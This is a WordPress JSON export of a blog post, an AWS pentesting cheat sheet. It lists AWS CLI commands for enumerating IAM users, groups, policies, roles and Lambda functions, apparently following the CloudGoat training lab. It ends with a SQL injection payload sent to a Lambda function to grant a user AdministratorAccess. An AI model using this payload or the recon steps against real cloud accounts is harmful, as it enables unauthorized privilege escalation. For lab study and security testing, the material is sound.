{"id":2186,"date":"2023-11-19T20:06:23","date_gmt":"2023-11-19T20:06:23","guid":{"rendered":"https:\/\/berenkudaygorun.com\/blog\/?p=2186"},"modified":"2023-11-21T20:30:30","modified_gmt":"2023-11-21T20:30:30","slug":"aws-pentesting-cheat-sheet","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2023\/11\/19\/aws-pentesting-cheat-sheet\/","title":{"rendered":"AWS Pentesting Cheat Sheet"},"content":{"rendered":"<blockquote>\n<p>O g\u00fcn baz\u0131 y\u00fczler de nimet i\u00e7indedir (mutludur).<br \/>\n\u00c7al\u0131\u015fmalar\u0131ndan memnundur.<br \/>\nY\u00fcksek bir cennettedir.<br \/>\nOrada bo\u015f s\u00f6z duymaz.<br \/>\nGa\u015fiye 8-11<\/p>\n<\/blockquote>\n<h1>1. Enumeration<\/h1>\n<h2>1.1. IAM<\/h2>\n<h2>1.1.1. Users<\/h2>\n<pre><code class=\"language-sh\"># List users\naws iam list-users\n\naws iam list-ssh-public-keys #User keys for CodeCommit\n\naws iam get-ssh-public-key --user-name &lt;username&gt; --ssh-public-key-id &lt;id&gt; --encoding SSH #Get public key with metadata\n\naws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services\n\naws iam get-user --user-name &lt;username&gt; #Get metadata of user, included permissions boundaries\n\naws iam list-access-keys #List created access keys<\/code><\/pre>\n<h2>1.1.2. Group<\/h2>\n<pre><code class=\"language-sh\"># List groups\naws iam list-groups #Get groups\n\naws iam list-groups-for-user --user-name &lt;username&gt; #Get groups of a user\n\naws iam get-group --group-name &lt;name&gt; #Get group name info<\/code><\/pre>\n<h2>1.1.3. Policy<\/h2>\n<pre><code class=\"language-sh\">## inline policies\naws iam list-user-policies --user-name &lt;username&gt; #Get inline policies of the user\n\naws iam get-user-policy --user-name &lt;username&gt; --policy-name &lt;policyname&gt; #Get inline policy details\n\n## attached policies\naws iam list-attached-user-policies --user-name &lt;username&gt; #Get policies of user, it doesn&#039;t get inline policies\n\naws iam get-group --group-name &lt;name&gt; #Get group name info\n\n## inline policies\naws iam list-group-policies --group-name &lt;username&gt; #Get inline policies of the group\n\naws iam get-group-policy --group-name &lt;username&gt; --policy-name &lt;policyname&gt; #Get an inline policy info\n\n## attached policies\naws iam list-attached-group-policies --group-name &lt;name&gt; #Get policies of group, it doesn&#039;t get inline policies\n\n## inline policies\naws iam list-role-policies --role-name &lt;name&gt; #Get inline policies of a role\n\naws iam get-role-policy --role-name &lt;name&gt; --policy-name &lt;name&gt; #Get inline policy details\n\naws iam list-attached-role-policies --role-name &lt;role-name&gt; #Get policies of role, it doesn&#039;t get inline policies\n\n# List policies\naws iam list-policies [--only-attached] [--scope Local]\n\naws iam list-policies-granting-service-access --arn &lt;identity&gt; --service-namespaces &lt;svc&gt; # Get list of policies that give access to the user to the service\n\n## Get policy content\naws iam get-policy --policy-arn &lt;policy_arn&gt;\n\naws iam list-policy-versions --policy-arn &lt;arn&gt;\n\naws iam get-policy-version --policy-arn &lt;arn:aws:iam::975426262029:policy\/list_apigateways&gt; --version-id &lt;VERSION_X&gt;\n<\/code><\/pre>\n<h2>1.1.4. Role<\/h2>\n<pre><code class=\"language-sh\"># This command will list all the roles in your account, one of which should be assumable. \naws --profile bilbo --region us-east-1 iam list-roles | grep cg-\n\n# This command will list all policies for the target role\naws --profile bilbo --region us-east-1 iam list-role-policies --role-name [cg-target-role]\n\n# This command will get you credentials for the cloudgoat role that can invoke lambdas.\naws --profile bilbo --region us-east-1 sts assume-role --role-arn [cg-lambda-invoker_arn] --role-session-name [whatever_you_want_here]\n\n# This command will return a bunch of information about the lambda that can apply policies to bilbo.\naws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]\n<\/code><\/pre>\n<h2>1.2. Lambda<\/h2>\n<h3>1.2.1. List<\/h3>\n<pre><code class=\"language-sh\"># This command will show you all lambda functions. The function belonging to cloudgoat (the name should start with &quot;cg-&quot;)\naws --profile assumed_role --region us-east-1 lambda list-functions\n\n# This command will return a bunch of information about the lambda that can apply policies to bilbo.\naws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]<\/code><\/pre>\n<h3>1.2.2. Invoke<\/h3>\n<pre><code class=\"language-sh\"># The following command will send a SQL injection payload to the lambda function\naws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload &#039;{&quot;policy_names&quot;: [&quot;AdministratorAccess&#039;&quot;&#039;&quot;&#039; --&quot;], &quot;user_name&quot;: [bilbo_user_name_here]}&#039; out.txt<\/code><\/pre>\n<p>NOT: G\u00fcncellenecektir...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>O g\u00fcn baz\u0131 y\u00fczler de nimet i\u00e7indedir (mutludur). \u00c7al\u0131\u015fmalar\u0131ndan memnundur. Y\u00fcksek bir cennettedir. Orada bo\u015f s\u00f6z duymaz. Ga\u015fiye 8-11 1. Enumeration 1.1. IAM 1.1.1. Users&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2023\/11\/19\/aws-pentesting-cheat-sheet\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">AWS Pentesting Cheat Sheet<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[618,697,36],"tags":[38],"class_list":["post-2186","post","type-post","status-publish","format-standard","hentry","category-aws","category-aws-pentesting","category-cheat-sheet","tag-cheat-sheet","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2186","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=2186"}],"version-history":[{"count":5,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2186\/revisions"}],"predecessor-version":[{"id":2196,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2186\/revisions\/2196"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=2186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=2186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=2186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}